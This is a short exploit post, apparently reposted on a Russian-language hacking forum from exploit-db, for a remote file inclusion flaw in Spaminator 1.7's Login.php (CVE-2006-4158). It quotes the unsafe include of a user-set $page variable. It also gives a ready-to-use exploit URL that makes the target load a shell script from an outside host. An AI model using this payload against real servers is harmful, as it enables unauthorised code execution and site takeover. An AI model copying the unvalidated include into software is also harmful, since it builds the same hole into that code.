Exploit Spaminator 1.7 - 'page' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2165
Проверка EDB
  1. Пройдено
Автор
DRAGO84
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-4158
Дата публикации
2006-08-10
Код:
Spaminator 1.7. ($page) Remote File Include
CreW: ToXiC
BuG Found By Drago84

SourcE CodE:
http://freshmeat.net/redir/spaminator/16281/url_tgz/spaminator-1.7.tar.gz

Page Affect is:
/src/Login.php

Problem is
   include "$page.php";

Path :
Declare $page

ExpL:
http://server/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?

Greatz:str0ke

# milw0rm.com [2006-08-10]
 
Источник
www.exploit-db.com

Похожие темы